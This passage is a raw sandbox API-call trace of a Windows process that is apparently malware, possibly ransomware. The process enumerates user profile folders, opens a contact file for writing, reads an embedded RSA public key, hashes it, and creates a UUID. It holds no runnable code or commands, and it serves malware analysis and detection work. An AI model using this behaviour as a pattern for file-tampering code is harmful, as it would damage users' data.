[0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.209] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f08 [0093.209] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.209] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f08 [0093.209] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.209] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.209] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.209] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0093.209] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0093.210] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0093.210] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.210] PathFindFileNameW (pszPath="") returned="" [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0093.210] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.210] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.210] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f8fabe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9f8fabe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x31ef928 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0093.210] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x38) returned 0x31c7580 [0093.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0093.211] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdb1770, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdb1770, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x99d9e08 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0093.211] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdb1770, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdb1770, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0093.211] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0093.211] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0093.211] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0093.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0093.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0093.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.212] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0093.212] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.212] PathFindFileNameW (pszPath="") returned="" [0093.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0093.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdb1770, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdb1770, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0093.212] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb510 [0093.212] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0093.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0093.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0093.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0093.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0093.213] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0093.213] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.213] PathFindFileNameW (pszPath="") returned="" [0093.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0093.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.213] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.213] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0093.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0093.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0093.213] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0093.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0093.215] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1178) returned 1 [0093.215] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0093.218] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.218] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0093.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.249] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x49a, lpOverlapped=0x0) returned 1 [0093.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x3193e68 [0093.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.250] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0093.250] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0093.251] CryptHashData (hHash=0x31c7580, pbData=0x3193e68, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0093.251] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0093.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0093.251] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.251] SetLastError (dwErrCode=0x0) [0093.251] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.252] SetLastError (dwErrCode=0x0) [0093.252] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.253] SetLastError (dwErrCode=0x0) [0093.253] GetLastError () returned 0x0 [0093.254] SetLastError (dwErrCode=0x0) [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0093.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0093.254] CryptDestroyHash (hHash=0x31c7580) returned 1 [0093.254] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0093.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0093.254] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0093.254] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0093.254] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0093.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4a0) returned 0x31d01f0 [0093.254] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0093.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bb140 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf78 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf60 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0093.254] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0093.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d0980 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf60 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf90 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x31baf60 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x31bab28 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf60 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: 